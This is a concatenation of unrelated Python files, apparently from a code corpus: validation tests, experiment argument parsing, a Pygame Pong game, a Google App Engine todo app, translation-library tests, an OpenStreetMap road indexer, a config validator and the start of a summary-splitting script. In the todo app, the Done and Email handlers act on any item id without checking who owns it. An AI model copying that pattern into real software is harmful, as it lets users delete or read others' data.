                                reporting_fiscal_year=prior.reporting_fiscal_year)
    row = ObjectClassProgramActivityFactory(submission_id=current.submission_id,
                                            gross_outlays_delivered_or_fyb=None,
                                            ussgl480100_undelivered_or_fyb=None)
    assert number_of_errors(_FILE, database, submission=current, models=[row]) == 0
def test_previous_publishable(database):
    """A prior submission merely marked publishable also permits a null value."""
    populate_publish_status(database)
    prior = SubmissionFactory(publishable=True)
    insert_submission(database, prior)
    current = SubmissionFactory(cgac_code=prior.cgac_code,
                                reporting_fiscal_year=prior.reporting_fiscal_year)
    row = ObjectClassProgramActivityFactory(submission_id=current.submission_id,
                                            gross_outlays_delivered_or_fyb=None)
    assert number_of_errors(_FILE, database, submission=current, models=[row]) == 0
def test_no_previous_submission(database):
    """A null gross_outlays_delivered_or_fyb with no prior submission is an error."""
    populate_publish_status(database)
    submission = SubmissionFactory()
    row = ObjectClassProgramActivityFactory(submission_id=submission.submission_id,
                                            gross_outlays_delivered_or_fyb=None)
    assert number_of_errors(_FILE, database, submission=submission, models=[row]) == 1
def test_previous_unpublished(database):
    """An unpublished, non-publishable prior submission does not excuse a null value."""
    populate_publish_status(database)
    prior = SubmissionFactory(publish_status_id=PUBLISH_STATUS_DICT['unpublished'], publishable=False)
    insert_submission(database, prior)
    current = SubmissionFactory(cgac_code=prior.cgac_code,
                                reporting_fiscal_year=prior.reporting_fiscal_year)
    row = ObjectClassProgramActivityFactory(submission_id=current.submission_id,
                                            ussgl480100_undelivered_or_fyb=None,
                                            ussgl490800_undelivered_or_fyb=None)
    assert number_of_errors(_FILE, database, submission=current, models=[row]) == 1
|
import argparse
def get_args():
    """Parse command-line arguments for a continual-learning experiment run.

    Returns
    -------
    argparse.Namespace
        The parsed arguments. ``--experiment`` and ``--approach`` are
        required; everything else has a default.
    """
    parser = argparse.ArgumentParser(description='Continual')
    # Arguments
    parser.add_argument('--seed', type=int, default=0, help='(default=%(default)d)')
    parser.add_argument('--experiment', default='', type=str, required=True,
                        choices=['mnist2',
                                 'pmnist',
                                 'split_pmnist',
                                 'row_pmnist',
                                 'mixture',
                                 'omniglot',
                                 'split_mnist',
                                 'split_notmnist',
                                 'split_row_pmnist',
                                 'split_cifar10_100',
                                 'split_cifar100',
                                 'split_cifar100_20',
                                 'split_CUB200',
                                 'split_tiny_imagenet',
                                 'split_mini_imagenet',
                                 'split_cifar10'],
                        help='(default=%(default)s)')
    parser.add_argument('--approach', default='', type=str, required=True,
                        choices=['random',
                                 'sgd',
                                 'sgd-frozen',
                                 'sgd_with_log',
                                 'sgd_L2_with_log',
                                 'lwf', 'lwf_with_log',
                                 'lfl',
                                 'ewc',
                                 'si',
                                 'rwalk',
                                 'mas',
                                 'ucl',
                                 'ucl_ablation',
                                 'baye_fisher',
                                 'baye_hat',
                                 'imm-mean',
                                 'progressive',
                                 'pathnet',
                                 'imm-mode',
                                 'sgd-restart',
                                 'joint',
                                 'hat',
                                 'hat-test'],
                        help='(default=%(default)s)')
    parser.add_argument('--optimizer', default='Adam', type=str, required=False,
                        choices=['SGD',
                                 'SGD_momentum_decay',
                                 'Adam'],
                        help='(default=%(default)s)')
    parser.add_argument('--ablation', default='None', type=str, required=False,
                        choices=['no_L1',
                                 'no_upper',
                                 'no_lower',
                                 'no_sigma_normal',
                                 'None'],
                        help='(default=%(default)s)')
    parser.add_argument('--output', default='', type=str, required=False, help='(default=%(default)s)')
    parser.add_argument('--nepochs', default=100, type=int, required=False, help='(default=%(default)d)')
    parser.add_argument('--unitN', default=400, type=int, required=False, help='(default=%(default)d)')
    parser.add_argument('--batch-size', default=256, type=int, required=False, help='(default=%(default)d)')
    parser.add_argument('--lr', default=0.001, type=float, required=False, help='(default=%(default)f)')
    parser.add_argument('--lr_rho', default=0.001, type=float, required=False, help='(default=%(default)f)')
    # FIX: several numeric defaults were string literals ('0.5', '0.03', '1',
    # '0.9'). argparse does coerce string defaults through `type`, but plain
    # numeric literals are clearer and do not rely on that corner case; the
    # parsed values are identical.
    parser.add_argument('--ratio', default=0.5, type=float, help='(default=%(default)f)')
    parser.add_argument('--alpha', default=0.01, type=float, help='(default=%(default)f)')
    parser.add_argument('--beta', default=0.03, type=float, help='(default=%(default)f)')
    parser.add_argument('--gamma', default=0.75, type=float, help='(default=%(default)f)')
    parser.add_argument('--smax', default=400, type=float, help='(default=%(default)f)')
    parser.add_argument('--lamb', default=1.0, type=float, help='(default=%(default)f)')
    parser.add_argument('--c', default=0.9, type=float, help='(default=%(default)f)')
    parser.add_argument('--date', type=str, default='', help='(default=%(default)s)')
    parser.add_argument('--tasknum', default=50, type=int, help='(default=%(default)s)')
    parser.add_argument('--conv-net', action='store_true', default=False, help='Using convolution network')
    # FIX: the help text was copy-pasted from --conv-net ('Using convolution
    # network'), which described the wrong flag.
    parser.add_argument('--rebuttal', action='store_true', default=False, help='Run the rebuttal experiment variant')
    parser.add_argument('--parameter', type=str, default='', help='(default=%(default)s)')
    parser.add_argument('--sample', type=int, default=1, help='Using sigma max to support coefficient')
    parser.add_argument('--rho', type=float, default=-2.783, help='initial rho')
    args = parser.parse_args()
    return args
# -*- coding: utf-8 -*-
import pygame
from pygame.locals import *
from random import randint
# Initialize Pygame core and its font subsystem before any rendering.
pygame.init()
pygame.font.init()
fontLG = pygame.font.SysFont('Arial', 30)  # large font: title and scores
fontSM = pygame.font.SysFont('Arial', 16)  # small font: instructions / countdown
clock = pygame.time.Clock()  # caps the main loop at 60 FPS (see main())
# Globals
WHITE = (255, 255, 255)  # RGB used for all drawing
ISDOWN = pygame.key.get_pressed()  # keyboard snapshot; refreshed inside update()
BOOL = {True: 1, False: 0}  # maps key states to paddle movement factors
SPEED = 3  # current ball speed; grows on paddle hits, reset on score
GAME_LIMIT = 5  # points needed to win a match
PLAYER_WON = None  # 1 or 2 once a match ends
REMATCH_TIMER = 10  # seconds to answer the rematch prompt
RUNNING = True  # main-loop flag; cleared on quit or match end
# Screen
pygame.display.set_caption("Pong")
screen = pygame.display.set_mode((800, 480), 0, 32)
width, height = pygame.display.get_surface().get_size()
screen.fill((0, 0, 0))
# Objects
class Ball:
    # Game ball: pixel position (x, y) and per-frame velocity (vx, vy).
    def __init__(self, x, y, vx, vy):
        """Create a ball at (x, y) that moves by (vx, vy) each update."""
        self.x = x
        self.y = y
        self.vx = vx
        self.vy = vy
class Player:
    # Paddle: pixel position (x, y) of its reference point plus the score.
    def __init__(self, x, y, score):
        """Create a paddle at (x, y) with an initial score."""
        self.x = x
        self.y = y
        self.score = score
# Initial game objects: the ball starts centred moving toward player 1;
# both paddles start vertically centred with zero score.
ball = Ball(width/2, height/2, -SPEED, SPEED)
player1 = Player(10, height/2, 0)
player2 = Player(width - 30, height/2, 0)
def initial_game_state(
        white=(255, 255, 255),
        is_down=None,
        bool_value=None, speed=3,
        game_limit=5, player_won=None, rematch_timer=10, running=True):
    """Reset all global game state (colors, speed, timers, ball, paddles).

    BUG FIX: the original evaluated ``pygame.key.get_pressed()`` and built
    the BOOL dict in the parameter defaults, so every call shared a single
    stale keyboard snapshot and one mutable dict. None sentinels defer both
    to call time; passing explicit values still works as before.
    """
    global WHITE
    global ISDOWN
    global BOOL
    global SPEED
    global GAME_LIMIT
    global PLAYER_WON
    global REMATCH_TIMER
    global RUNNING
    global ball
    global player1
    global player2
    WHITE = white
    # Take a fresh keyboard snapshot unless the caller supplied one.
    ISDOWN = pygame.key.get_pressed() if is_down is None else is_down
    # Build a fresh mapping unless the caller supplied one.
    BOOL = {True: 1, False: 0} if bool_value is None else bool_value
    SPEED = speed
    GAME_LIMIT = game_limit
    PLAYER_WON = player_won
    REMATCH_TIMER = rematch_timer
    RUNNING = running
    ball = Ball(width/2, height/2, -SPEED, SPEED)
    player1 = Player(10, height/2, 0)
    player2 = Player(width - 30, height/2, 0)
def update():
    """Advance the game one frame: input, paddle clamping, ball physics, scoring."""
    global RUNNING
    global SPEED
    global PLAYER_WON
    pygame.event.pump()
    # NOTE(review): this assigns a LOCAL ISDOWN that shadows the module-level
    # global (no `global ISDOWN` here) — the stale global is never refreshed.
    # Works because only this local is read below; confirm if intentional.
    ISDOWN = pygame.key.get_pressed()
    # End the match as soon as either player reaches the point limit.
    if player1.score == GAME_LIMIT:
        RUNNING = False
        PLAYER_WON = 1
        return
    elif player2.score == GAME_LIMIT:
        RUNNING = False
        PLAYER_WON = 2
        return
    # Move paddles 7 px per frame: P1 uses Q/A, P2 uses UP/DOWN arrows.
    player1.y = player1.y + \
        (BOOL[ISDOWN[pygame.K_a]] - BOOL[ISDOWN[pygame.K_q]]) * 7
    player2.y = player2.y + \
        (BOOL[ISDOWN[pygame.K_DOWN]] - BOOL[ISDOWN[pygame.K_UP]]) * 7
    # Clamp both paddles to the playable vertical band.
    if player1.y < 100:
        player1.y = 100
    if player1.y > (height - 60):
        player1.y = height - 60
    if player2.y < 100:
        player2.y = 100
    if player2.y > (height - 60):
        player2.y = height - 60
    # Integrate ball position.
    ball.x = ball.x + ball.vx
    ball.y = ball.y + ball.vy
    # Bounce off the top/bottom walls.
    if abs(ball.y) >= (height - 20):
        ball.vy = -ball.vy
    if abs(ball.y) <= 60:
        ball.vy = -ball.vy
    # Left paddle hit: speed up slightly and rebound with some randomness.
    if ball.x < 40 and ball.x > 20 and abs(player1.y - ball.y) < 60:
        SPEED = SPEED + 0.2
        ball.x = 40
        ball.vx = SPEED
        ball.vy = ball.vy * 0.5 + randint(-10, 10) / 20 * SPEED
    # Ball left the screen on the left: point for player 2, reset serve.
    if ball.x < -10:
        ball.x = width/3 * 2
        ball.y = height/2
        SPEED = 3
        ball.vx = -SPEED
        ball.vy = -SPEED
        player2.score = player2.score + 1
    # Right paddle hit: larger speed-up and a stronger random deflection.
    if ball.x > (width - 40) and ball.x < (width - 20) and abs(player2.y - ball.y) < 60:
        SPEED = SPEED + 0.5
        ball.x = (width - 40)
        ball.vx = -SPEED
        ball.vy = ball.vy * 0.8 + randint(-10, 10) / 10 * SPEED
    # Ball left the screen on the right: point for player 1, reset serve.
    if ball.x > width + 10:
        ball.x = width/3
        ball.y = height/2
        SPEED = 3
        ball.vx = SPEED
        ball.vy = SPEED
        player1.score = player1.score + 1
    # Window close button ends the game loop.
    for event in pygame.event.get():
        if event.type == QUIT:
            RUNNING = False
def draw():
    """Render one frame: title, paddles, ball, scores, and key instructions."""
    title = fontLG.render("PONG", False, WHITE)
    screen.blit(title, (width/2 - title.get_size()[0]/2, 10))
    # Paddles are 20x100 rectangles centred vertically on each player's y.
    pygame.draw.rect(screen, WHITE, [player1.x, player1.y - 50, 20, 100])
    pygame.draw.rect(screen, WHITE, [player2.x, player2.y - 50, 20, 100])
    pygame.draw.circle(screen, WHITE, [int(ball.x), int(ball.y)], 10)
    # Player 1 score and controls, top-left.
    score1 = fontLG.render(str(player1.score), False, WHITE)
    screen.blit(score1, (10, 10))
    instructions1 = fontSM.render("P1 Keys: Q and A", False, WHITE)
    screen.blit(instructions1, (score1.get_size()[0] + 20, 18))
    # Player 2 score and controls, top-right (right-aligned).
    score2 = fontLG.render(str(player2.score), False, WHITE)
    screen.blit(score2, (width - score2.get_size()[0] - 10, 10))
    instructions2 = fontSM.render("P2 Keys: UP and DOWN", False, WHITE)
    screen.blit(instructions2, (width - score2.get_size()
                                [0] - 20 - instructions2.get_size()[0], 18))
def drawGameEnd():
    """Render the match-over screen: winner, rematch prompt, and countdown."""
    screen.fill((0, 0, 0))
    title = fontLG.render("Player {0} won!".format(PLAYER_WON), False, WHITE)
    screen.blit(title, (width/2 - title.get_size()[0]/2, height/4))
    message = fontSM.render("Up for a rematch? (y / n)", False, WHITE)
    screen.blit(message, (width/2 - message.get_size()[0]/2, height/2))
    # Remaining seconds before the prompt auto-declines (see game_end()).
    message = fontSM.render("({0})".format(REMATCH_TIMER), False, WHITE)
    screen.blit(message, (width/2 - message.get_size()[0]/2, 3*height/4))
    pygame.display.flip()
def main():
    """Run pong matches until the player declines (or times out on) a rematch.

    BUG FIX: the original restarted a match by calling main() recursively,
    growing the call stack by one frame per rematch. An outer loop is
    behaviorally identical without the unbounded recursion.
    """
    global RUNNING
    while True:
        initial_game_state()  # also resets RUNNING and REMATCH_TIMER
        while RUNNING:
            print("Game running")
            screen.fill((0, 0, 0))
            update()
            draw()
            clock.tick(60)  # cap at 60 FPS
            pygame.display.flip()
        # game_end() returns True when the player declines a rematch.
        if game_end():
            break
        print("Game restarted")
def game_end():
    """Show the rematch prompt and return True if the game should end.

    Returns True when the player presses N or the countdown expires,
    False when the player presses Y (rematch requested).
    """
    global REMATCH_TIMER
    result = True
    while True:
        # Retry or not
        events = pygame.event.get()
        selected = None
        for event in events:
            if event.type == pygame.KEYDOWN:
                if event.key == pygame.K_y:
                    print("Yes pressed!")
                    selected = "y"
                    break
                elif event.key == pygame.K_n:
                    selected = "n"
                    break
        # Has the timer ended?
        if REMATCH_TIMER <= 0:
            result = True
            break
        # Check selected
        if selected == "y":
            result = False
            break
        elif selected == "n":
            result = True
            break
        # Keeps counting down: redraw the prompt once per second.
        REMATCH_TIMER -= 1
        drawGameEnd()
        pygame.time.wait(1000)
    return result
# IDIOM FIX: guard the entry point so importing this module no longer starts
# the game as a side effect; behavior when run as a script is unchanged.
if __name__ == "__main__":
    if RUNNING:
        main()
    pygame.quit()
|
<gh_stars>0
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext import db
from google.appengine.ext.webapp import template
from google.appengine.api import mail
# TodoModel defines the datastore schema for todo items; because it extends
# db.Model, instances are persisted automatically by App Engine.
class TodoModel(db.Model):
    """Datastore entity representing a single todo item."""
    author = db.UserProperty(required=True)              # owning user
    shortDescription = db.StringProperty(required=True)  # one-line title
    longDescription = db.StringProperty(multiline=True)  # optional details
    url = db.StringProperty()                            # optional related link
    created = db.DateTimeProperty(auto_now_add=True)     # set once on insert
    updated = db.DateTimeProperty(auto_now=True)         # refreshed on every put
    dueDate = db.StringProperty(required=True)           # free-form due date text
    finished = db.BooleanProperty()                      # completion flag
# The main page where the user can login and logout.
# MainPage subclasses webapp.RequestHandler and overrides get().
class MainPage(webapp.RequestHandler):
    """Landing page: lists the current user's open todos with a login/logout link."""

    def get(self):
        """Render index.html with the signed-in user's unfinished todos."""
        current_user = users.get_current_user()
        if current_user:
            auth_url = users.create_logout_url(self.request.uri)
            auth_label = 'Logout'
        else:
            auth_url = users.create_login_url(self.request.uri)
            auth_label = 'Login'
        # GQL is similar to SQL; fetch only this user's unfinished todos.
        open_todos = TodoModel.gql("WHERE author = :author and finished=false",
                                   author=users.get_current_user())
        template_values = {
            'todos': open_todos,
            'numbertodos': open_todos.count(),
            'user': current_user,
            'url': auth_url,
            'url_linktext': auth_label,
        }
        self.response.out.write(template.render('index.html', template_values))
# This class creates a new Todo item.
class New(webapp.RequestHandler):
    """Handler that stores a new todo built from the submitted form fields."""

    def post(self):
        """Persist a TodoModel for the signed-in user, then go back home."""
        user = users.get_current_user()
        if user:
            link = self.request.get('url')
            # Prefix a scheme for non-empty links that lack one.
            if not link.startswith("http://") and link:
                link = "http://" + link
            todo = TodoModel(
                author=users.get_current_user(),
                shortDescription=self.request.get('shortDescription'),
                longDescription=self.request.get('longDescription'),
                dueDate=self.request.get('dueDate'),
                url=link,
                finished=False)
            todo.put()
        self.redirect('/')
# This class deletes the selected Todo.
class Done(webapp.RequestHandler):
    """Handler that deletes the todo identified by its datastore id."""

    def get(self):
        """Delete the TodoModel named by the 'id' query parameter, then redirect home."""
        user = users.get_current_user()
        if user:
            # IDIOM FIX: the original bound the parsed id to a local named
            # `id`, shadowing the builtin.
            todo_id = int(self.request.get('id'))
            todo = TodoModel.get_by_id(todo_id)
            todo.delete()
        self.redirect('/')
# This class emails the task to yourself.
class Email(webapp.RequestHandler):
    """Handler that emails the selected todo to its owner."""

    def get(self):
        """Send the todo named by the 'id' query parameter to the user's own address."""
        user = users.get_current_user()
        if user:
            # IDIOM FIX: avoid shadowing the builtin `id` (as the original did).
            todo_id = int(self.request.get('id'))
            todo = TodoModel.get_by_id(todo_id)
            message = mail.EmailMessage(sender=user.email(),
                                        subject=todo.shortDescription)
            message.to = user.email()
            message.body = todo.longDescription
            message.send()
        self.redirect('/')
# Map each URL path to its handler class.
application = webapp.WSGIApplication(
    [('/', MainPage),
     ('/new', New),
     ('/done', Done),
     ('/email', Email)],
    debug=True)
# Entry point: hand the WSGI application to the App Engine runtime.
def main():
    run_wsgi_app(application)
if __name__ == "__main__":
    main()
import unittest
import os
from m2translate import *
__author__ = '<NAME> (<EMAIL>)'
# clear all translate files for json store connector
json_path = os.path.join('json_store')
def count_json_locales(path):
    """Count the '.json' files directly inside *path* (non-recursive;
    directories whose names end in '.json' are ignored)."""
    return sum(
        1
        for entry in os.listdir(path)
        if os.path.isfile(os.path.join(path, entry))
        and os.path.splitext(entry)[1] == '.json'
    )
# init translate module and json store connector
connector = JSONConnector()
# Missing placeholder lookups resolve to 'N/A' instead of raising.
tr = M2Translate(connector, not_found_val='N/A')
# Start each test run from an empty store so results are reproducible.
tr.clear_store()
class M2TranslateTests(unittest.TestCase):
    """Ordered integration tests for M2Translate with the JSON store.

    The numeric test names matter: unittest runs methods alphabetically and
    each test builds on the state left by the previous one (module-level
    `tr` / `connector`).
    """
    def test_001_create_locale(self):
        tr.add_locale('ru_RU', dump_permanently=False)
        self.assertEqual(len(tr.locales), 1)
        print('#001 Locale `ru_RU` created in memory')
    def test_002_add_phs_to_ru(self):
        # set_p without `l=` targets the current locale; `l='ru_RU'` is explicit.
        tr.set_p('FORM1.NAME', none='Имя')
        tr.set_p('FORM1.SURNAME', none='Фамилия', l='ru_RU')
        tr.set_p('FORM1.VISITS', none='визитов', single='визит', multi='визитов')
        self.assertEqual(len(tr.locales['ru_RU']), 3)
        print('#002 Added placeholders for `ru_RU`')
    def test_003_dump_ru_locale(self):
        tr.dump_locales()
        print('#003 Dumped locales (`ru_RU`)')
    def test_004_create_new_locale(self):
        tr.add_locale('en_US', dump_permanently=False)
        self.assertEqual(len(tr.locales), 2)
        print('#004 Locale `en_US` created in memory')
    def test_005_set_active_locale(self):
        tr.set_cur_locale('en_US')
        self.assertEqual(tr.cur_locale, 'en_US')
        print('#005 Locale `en_US` has been set as active')
    def test_006_add_phs_to_en(self):
        tr.set_p('FORM1.NAME', none='Name')
        tr.set_p('FORM1.SURNAME', none='Surname', l='en_US')
        tr.set_p('FORM1.VISITS', none='visits', single='visit', multi='visits')
        tr.set_p('FORM1.SUBMIT', none='OK')
        self.assertEqual(len(tr.locales['ru_RU']), 3)
        self.assertEqual(len(tr.locales['en_US']), 4)
        print('#006 Added placeholders for `en_US`')
    def test_007_dump_en_locale(self):
        # NOTE(review): after dumping, ru_RU grows from 3 to 4 placeholders —
        # dumping appears to sync keys across locales; confirm against
        # M2Translate.dump_locales.
        tr.dump_locales()
        self.assertEqual(len(tr.locales['ru_RU']), 4)
        self.assertEqual(len(tr.locales['en_US']), 4)
        print('#007 Dumped locales (`en_US`)')
    def test_008_reload_locales(self):
        # An undumped placeholder must disappear after reloading from disk.
        tr.set_p('WILL_BE_ERASED', none='', single='', multi='')
        self.assertEqual(len(tr.locales['en_US']), 5)
        tr.reload_locales()
        self.assertEqual(len(tr.locales['en_US']), 4)
        print('#008 Locales are reloaded')
    def test_009_remove_locale(self):
        tr.add_locale('tmp_locale')
        tr.dump_locales()
        self.assertEqual(count_json_locales(json_path), 3)
        tr.remove_locale('tmp_locale', dump_permanently=True)
        self.assertEqual(count_json_locales(json_path), 2)
        print('#009 Locale was successfully created and then removed')
    def test_010_get_translations(self):
        # Plural selection: 0 and 10 take the 'multi' form, 1 takes 'single'.
        tr.set_cur_locale('ru_RU')
        self.assertEqual(tr.p('FORM1.VISITS', 0), 'визитов')
        self.assertEqual(tr.p('FORM1.VISITS', 1), 'визит')
        self.assertEqual(tr.p('FORM1.VISITS', 10), 'визитов')
        tr.set_cur_locale('en_US')
        self.assertEqual(tr.p('FORM1.VISITS', 0), 'visits')
        self.assertEqual(tr.p('FORM1.VISITS', 1), 'visit')
        self.assertEqual(tr.p('FORM1.VISITS', 10), 'visits')
        print('#010 Placeholder values were successfully returned')
|
<reponame>sahyagiri/osm_roads
import h5py
import json
import ast
from geojson import LineString, Point, Feature
from turfpy.measurement import point_to_line_distance
import geohash
import osmium as osm
class OsmRoads(osm.SimpleHandler):
    """Index OpenStreetMap road segments by geohash in an HDF5 store and
    answer nearest-road queries.

    Pass a .osm.pbf file to build a new store, or omit it to open an
    existing HDF5 store read-only.
    """

    def __init__(self, hdf5_file_name: str, openstreetmap_pbf_file_name=None):
        osm.SimpleHandler.__init__(self)
        # IDIOM FIX: `is not None` instead of `!= None`.
        if openstreetmap_pbf_file_name is not None:
            self.hdf5_connection = self.__load_openstreetmap_road_data(openstreetmap_pbf_file_name, hdf5_file_name)
        else:
            self.hdf5_connection = self.__load_hdf5_file(hdf5_file_name)

    def __insert_geohash_road_segment(self, road_segment: dict):
        """Store one segment as JSON under /<geohash[:6]>/<geohash[6:]>/<n>."""
        geohash_prefix = road_segment['geohash'][:6]
        geohash_suffix = road_segment['geohash'][6:]
        # ROBUSTNESS FIX: the bare `except:` clauses (which also swallowed
        # KeyboardInterrupt/SystemExit) are narrowed to Exception; create_group
        # fails when the group already exists, in which case we reuse it.
        try:
            self.hdf5_connection.create_group(geohash_prefix)
        except Exception:
            pass  # prefix group already exists
        try:
            group2 = self.hdf5_connection.create_group(geohash_prefix + '/' + geohash_suffix)
        except Exception:
            group2 = self.hdf5_connection.get('/' + geohash_prefix + '/' + geohash_suffix)
        item_count = str(len(group2.items()) + 1)
        group2.create_dataset(item_count, data=json.dumps(road_segment).encode("utf-8"))

    def way(self, way):
        """osmium callback: capture every way tagged with a road-like highway value."""
        if way.tags.get("highway") in {'bridleway','construction','cycleway','footway','living_street','motorway','motorway_link','path','pedestrian','platform','primary','primary_link','proposed','raceway','residential','rest_area','road','secondary','secondary_link','service','steps','tertiary','tertiary_link','track','trunk','trunk_link','unclassified'}:
            # Collect [lon, lat] pairs for nodes with a resolved location.
            nodes = []
            for member_node in way.nodes:
                if member_node.location.valid():
                    nodes.append([member_node.lon, member_node.lat])
            # ROBUSTNESS FIX: a way whose nodes all lack locations would have
            # raised IndexError below; skip it instead.
            if not nodes:
                return
            # Geohash the segment by its (approximate) midpoint node.
            geohash_mid_point_index = int(len(nodes) / 2)
            geohash_key = geohash.encode(nodes[geohash_mid_point_index][1], nodes[geohash_mid_point_index][0])
            # Serialize coordinates as a "[[lon,lat],...]" literal string.
            way_points = "["
            for point in nodes:
                way_points += '[' + str(point[0]) + "," + str(point[1]) + '],'
            way_points = way_points[:-1] + "]"
            road_segment = dict(way.tags)
            road_segment['geohash'] = geohash_key
            road_segment['coordinates'] = way_points
            self.__insert_geohash_road_segment(road_segment)

    def __load_openstreetmap_road_data(self, openstreetmap_pbf_file_name, hdf5_file_name):
        """Parse the PBF into a fresh HDF5 file, then reopen it read-only."""
        self.hdf5_connection = h5py.File(hdf5_file_name, "w")
        self.apply_file(openstreetmap_pbf_file_name, locations=True)
        self.hdf5_connection.close()
        # return read only handler
        return self.__load_hdf5_file(hdf5_file_name)

    def __load_hdf5_file(self, hdf5_file_name):
        """Open an existing HDF5 store read-only, raising ValueError on failure."""
        try:
            return h5py.File(hdf5_file_name, "r")
        except Exception as err:  # narrowed from a bare except; chain the cause
            raise ValueError("The program could not load the file.Possible invalid/corrupt file.") from err

    def get_closest_road(self, latitude: float, longitude: float):
        """Return the tag dict of the stored road nearest to (latitude, longitude).

        Only segments inside the query point's 6-character geohash cell are
        searched; the result gains a 'distance' key (stays 1000 when nothing
        matched). NOTE(review): raises KeyError if the cell has no group in
        the store — confirm whether callers rely on that.
        """
        DISTANCE_MAX = 1000
        geohash_prefix = geohash.encode(latitude, longitude)[:6]
        point = Feature(geometry=Point([longitude, latitude]))
        distance = DISTANCE_MAX
        road_information = {}
        for road_segments in self.hdf5_connection[geohash_prefix]:
            for road_subsegments in self.hdf5_connection[geohash_prefix][road_segments].keys():
                metadata_dictionary = ast.literal_eval(self.hdf5_connection[geohash_prefix][road_segments][road_subsegments][()].decode("utf-8"))
                line_string = Feature(geometry=LineString(ast.literal_eval(metadata_dictionary['coordinates'])))
                current_distance = point_to_line_distance(point, line_string)
                if current_distance < distance:
                    distance = current_distance
                    road_information = metadata_dictionary
        road_information['distance'] = distance
        return road_information

    def close_database(self):
        """Close the HDF5 file, ignoring errors from an already-closed handle."""
        try:
            self.hdf5_connection.close()
        except Exception:
            pass

    def __del__(self):
        # BUG FIX: the original closed unconditionally, which raised if
        # __init__ failed before the connection existed or if the store was
        # already closed via close_database().
        try:
            self.hdf5_connection.close()
        except Exception:
            pass
import os
import toml
from typing import List
from datetime import datetime
from utils import persistence
class GlobalConfig:
    """
    Main Config.

    Loads a scenario TOML file, validates its [setup] and [paths] sections,
    and collects a summary of the run configuration in ``self.RECORDS``.
    """
    def __init__(self, path: str) -> None:
        """
        Config object constructor.
        :param path: Path to scenario configuration TOML file
        """
        parsed_toml = toml.load(path, _dict=dict)

        # Scenario settings
        self.SOURCE = path

        # Setup
        self.SOURCES = self.valid_samplers(parsed_toml["setup"]["sources"])
        self.SAMPLE = self.valid_sample_float(parsed_toml["setup"]["sample"])
        self.EPSG = self.valid_int(parsed_toml["setup"]["epsg"], "epsg")
        self.SEED = self.valid_int(parsed_toml["setup"]["seed"], "seed")
        self.VERBOSE = self.valid_bool(parsed_toml["setup"]["verbose"], "verbose")

        # Paths
        self.data_location = self.valid_path(parsed_toml["paths"]["data_dir"], "data_dir")
        self.OUTPATH = self.valid_path(parsed_toml["paths"]["out_dir"], "out_dir", create=True)
        self.plans_name = parsed_toml["paths"]["plans_name"]
        self.XMLPATH = os.path.join(self.OUTPATH, self.plans_name)
        self.attributes_name = parsed_toml["paths"]["attributes_name"]
        self.XMLPATHATTRIBS = os.path.join(self.OUTPATH, self.attributes_name)

        # Records to include in output and log:
        self.RECORDS = {
            'config': self.SOURCE,
            'outpath': self.OUTPATH,
            'timestamp': str(datetime.now()),
            'data_dir': self.data_location,
            'sources': self.SOURCES,
            'sample': self.SAMPLE,
            'crs': self.EPSG,
            'seed': self.SEED,
            'plans_name': self.XMLPATH,
            'attributes_name': self.XMLPATHATTRIBS,
        }

    def print_records(self):
        """Print each configuration record on its own indented line."""
        for k, v in self.RECORDS.items():
            print('\t> {}: {}'.format(k, v))

    @staticmethod
    def valid_path(path: str, field_name: str = 'missing', create: bool = False) -> str:
        """
        Raise exception if specified path does not exist, otherwise return path.
        :param path: Path to check
        :param field_name: Field name to use in exception if path does not exist
        :param create: create given path if missing, boolean, default=False
        :return: Pass through path if it exists
        """
        if not persistence.dir_exists(path):
            # S3 locations cannot be created locally; only make local dirs.
            if not persistence.is_s3_location(path) and create:
                print(f"Creating directory; {path}")
                os.mkdir(path)
            else:
                raise Exception(f"Specified path for {field_name}: {path} does not exist")
        return path

    @staticmethod
    def valid_file(path: str, field_name: str = 'missing') -> str:
        """
        Raise exception if specified path does not exist, otherwise return path.
        :param path: Path to check
        :param field_name: Field name to use in exception if path does not exist
        :return: Pass through path if it exists
        """
        if not persistence.file_exists(path):
            raise Exception(f"Specified path for {field_name}: {path} does not exist")
        return path

    @staticmethod
    def valid_samplers(inp: List[str]) -> List[str]:
        """
        Raise exception if the sampler list is empty or contains non-string
        entries, otherwise return it unchanged.
        :param inp: list of strings expected
        :return: list[str]
        """
        # BUG FIX: the original used `and`, so the check never fired — an
        # empty list makes `not all(...)` False (all() of empty is True), and
        # a non-empty list makes `not inp` False. `or` enforces both
        # conditions as the docstring intends.
        if not inp or not all(isinstance(s, str) for s in inp):
            raise Exception(
                f'Specified samplers: ({inp}) expected to be list of strings'
            )
        return inp

    @staticmethod
    def valid_sample_float(inp: float) -> float:
        """
        Raise exception if specified float is outside an acceptable range, i.e.
        beyond [0.01, 100], otherwise return scale factor.
        :param inp: Scale factor
        :return: Pass through scale factor if valid
        """
        if inp < 0.01 or inp > 100:
            raise Exception(
                "Specified sample percentage ({}) not in valid range".format(inp)
            )
        return float(inp)

    @staticmethod
    def valid_int(inp: int, field_name: str) -> int:
        """
        :param inp: integer expected
        :param field_name: Field name to use in exception
        :return: int
        """
        # NOTE: bools pass isinstance(..., int); tightening would change the
        # accepted inputs, so the original behavior is kept.
        if not isinstance(inp, int):
            raise Exception(
                f'Specified {field_name}: ({inp}) expected to be integer'
            )
        return inp

    @staticmethod
    def valid_bool(inp: bool, field_name: str) -> bool:
        """
        :param inp: bool expected
        :param field_name: Field name to use in exception
        :return: bool
        """
        if not isinstance(inp, bool):
            raise Exception(
                f'Specified {field_name}: ({inp}) expected to be boolean'
            )
        return inp
|
"""
/*
* Copyright (c) 2021, salesforce.com, inc.
* All rights reserved.
* SPDX-License-Identifier: BSD-3-Clause
* For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
*/
This script is used to identify and separate summaries of the following kind from scraped summary files:
Chapter 1 Summary:
Chapter 2 Summary:
Chapter 3 Summary:
.
.
Not all combined summaries are separable, but using this script, we try to find the ones that are not a 'true'
combined summary, but rather just a collection of different chapter summaries in the same document.
"""
import json
import os
import re
from os.path import basename, dirname
from word2number import w2n
from unidecode import unidecode
from tqdm import tqdm
from string import punctuation
# An intermediate matched file is required.
# BUG FIX: the assignment below was duplicated verbatim in the original.
matched_books = "../../alignments/summary_chapter_matched_intermediate.jsonl"
chapterized_books_dir = "../../"  # replace with wherever the chapterized books are extracted
f_matched = open(matched_books, "r")
# Collect the bare book ids (everything before the first '.') of all matches.
all_matched_titles = []
for line in f_matched:
    x = json.loads(line)
    all_matched_titles.append(x['book_id'].split('.')[0])
# Error file to keep track of different error cases
